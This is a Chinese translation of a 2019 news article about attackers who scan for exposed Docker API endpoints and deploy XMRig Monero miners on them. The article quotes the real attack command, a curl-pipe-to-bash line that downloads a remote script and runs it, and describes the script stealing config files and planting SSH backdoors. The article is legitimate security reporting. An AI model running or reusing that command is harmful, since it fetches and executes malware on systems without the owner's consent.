写点什么

黑客组织劫持 Docker 系统挖掘加密货币

  • 2019-11-29
  • 本文字数:1436 字

    阅读完需:约 5 分钟

黑客组织劫持 Docker 系统挖掘加密货币


现在都快 2020 年了,但还有不少系统管理员,仍然将 Docker 管理端口暴露在互联网上。


目前,有家黑客组织正在互联网上进行大规模的扫描,试图寻找那些在互联网上暴露了 API 端点的 Docker 平台。


黑客组织这次扫描行动的目的,是让他们能够向 Docker 实例发送命令,并在公司的 Docker 实例上部署加密货币挖矿程序,最终利用他们的算力进行挖矿,从而为黑客组织自身带来利益。

专业行动

这次大规模扫描行动于 11 月 24 日开始,由于扫描行动的规模极其庞大,因此一开始就立即引起了人们的注意。


Bad Packets LLC 的首席研究官兼联合创始人 Troy Mursch 对 ZDNet 称:“Bad Packets CTI API 的用户应该清楚利用暴露的 Docker 实例进行攻击并非什么新鲜事,而且这种行为经常发生。”


他指出,“黑客组织这次行动的不同之处在于,他们这次扫描行动规模特别夸张。仅此一点,就值得我们进一步调查,分析他们利用僵尸网络的意图究竟是什么。”


作为本次扫描行动的发现者,Mursch 说:“正如其他人指出的,这次行动的规模可不是那种脚本攻击的小孩把戏。黑客组织在这次扫描行动中投入了大量精力,但我们还没有搞清楚他们到底想干什么。”


推特用户 Bad Packets Report(@bad_packets)在 11 月 25 日发推文称:


这是一场扫描互联网上暴露的 Docker API 端点的随机性大规模扫描行动。

这些扫描行动利用 Alpine Linux 映像来创建一个容器,并通过以下方式执行有效负载:

"Command": chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'


目前我们所掌握的情况

到目前为止,我们所知道的是,这些攻击背后的组织正在扫描超过 59000 个 IP 网络(网络块),试图寻找暴露的 Docker 实例。


一旦黑客组织识别出暴露的主机后,攻击者就会使用 API 端点启动 Alpine Linux OS 容器,并在其中执行以下命令:


chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;
复制代码


上面的命令从攻击者的服务器下载并运行一份 Bash 脚本。这个脚本的作用就是在目标设备上安装一个经典 XMRRig 加密货币的挖矿程序。Mursch 指出,在这次行动开始后的两天,黑客组织已经挖出了 14.82 枚门罗币(XMR),其价格略高于 740 美元。



此外,Mursch 还发现,这种恶意扫描行动还有某种自我防御的机制。


Mursch 告诉我们:“这次黑客行动,虽然并非原创,但我们观察到一个有趣的情况,就是黑客组织会从 http://ix.io/1XQh 下载脚本来卸载已知的监视代理程序并杀死大量相关进程。”


Mursch 通过检查这个脚本,还发现黑客组织不仅正在试图禁用安全产品,还关闭了与竞争对手的加密货币挖矿僵尸网络(如 DDG)相关的 LSO 进程。


此外,Mursch 还发现,这个恶意脚本还有一个功能,就是它能够通过扫描受感染的主机来查找 rConfig 配置文件,并对其进行加密和窃取,然后将文件发送回黑客组织的服务器(一般是僵尸网络)。


此外,Sandfly Security 的创始人 Craig H. Rowland 也注意到,黑客组织还在被入侵的容器上创建后门账户,并留下 SSH 密钥以便更方便他们日后进行访问,这样,他们就可以从远程控制所有受感染的肉鸡目标。


Mursch 建议,运行 Docker 实例的用户和组织,应立即检查自己是否在互联网上公开了 API 端点,如果已经公开,就立即关闭端口,然后关停无法识别的运行中的容器。


作者介绍:


Catalin Cimpanu,ZDNet 的信息安全记者,负责报道网络安全、数据泄露、黑客攻击和其他相关话题。此前曾担任 Bleeping Computer 和 Softpedia 的信息安全记者。


原文链接:


A hacking group is hijacking Docker systems with exposed API endpoints


2019-11-29 13:531641

评论

发布
暂无评论
发现更多内容

再也不怕 JavaScript 报错了,怎么看怎么处理都在这

前端依依

学习 技术 大前端 js

Socket 通信原理

一个大红包

8月日更

小说类公众号如何运营:先要满足特定读者人群

石头IT视角

做正确的事情,而不是把事情做正确

非著名程序员

个人成长 提升认知 认知提升 8月日更

InnoDB 表空间

leonsh

MySQL innodb 表空间

Agora 教程丨一个典型案例,教你如何使用水晶球“数据洞察”

声网

Agora 教程 水晶球

docker概念很乱?俺来替你理一下!

Java Docker 架构 后端

☕【Java技术指南】「编译器专题」重塑认识Java编译器的执行过程(常量优化机制)!

洛神灬殇

Java 编译器 技术栈 8月日更

上游思维:凭一己之力能做些什么?

石云升

读书笔记 8月日更 上游思维

干货!DataPipeline2021数据管理与创新大会全篇划重点

DataPipeline数见科技

大数据 数据融合 数据管理

跨团队项目的集成测试实践分享

PingCode研发中心

软件测试 测试

最好用的 Angular 甘特图组件 ngx-gantt

PingCode研发中心

软件 工具 甘特图 ngx-gantt

Go- switch-case结构

HelloBug

Go 语言 switch case

半监督学习概述(二)

Databri_AI

学习 深度半监督

Go- for循环

HelloBug

for Go 语言

Go- goto和label

HelloBug

Go 语言 goto label

程序员作图工具和技巧,你 get 了么?

程序员鱼皮

Java 大前端 后端 架构设计 代码

【漏洞分析】远程命令执行漏洞总结

网络安全学海

网络安全 信息安全 网络 渗透测试 安全漏洞

英特尔CEO帕特·基辛格:面向未来的数字化需求,推进未来计算创新、探索与颠覆

科技新消息

Python代码阅读(第16篇):列表求差集

Felix

Python 编程 Code Programing 阅读代码

Go- 函数返回值

HelloBug

函数 返回值 Go 语言

Vue进阶(五十九):ES数组操作:splice() 实现数组删除、替换、增加指定元素

No Silver Bullet

Vue 8月日更 splice

不少同学想要放弃秋招了........

今晚早点睡

程序员 秋招

获取 NodeJS 程序退出码

编程三昧

node.js Node 8月日更

项目进度经常超时怎么办?项目经理如何有效管理项目进度?

优秀

项目管理工具

适女化科技(一):伪需求,真消费

脑极体

阿里巴巴最新产物!Spring+SpringBoot+SpringCloud Alibaba全系列高阶笔记

Java spring 程序员 架构 后端

重构你的css吧!(初看)

云小梦

CSS bem elementUI scss ITCSS

火爆 GitHub!这个图像分割神器开源了

百度开发者中心

人工智能 开源 最佳实践 图像

Go- break和continue

HelloBug

Go 语言 break continue

云与AI真的能互相成就?还是最好各自独立行走?

脑极体

黑客组织劫持 Docker 系统挖掘加密货币_区块链_Catalin Cimpanu_InfoQ精选文章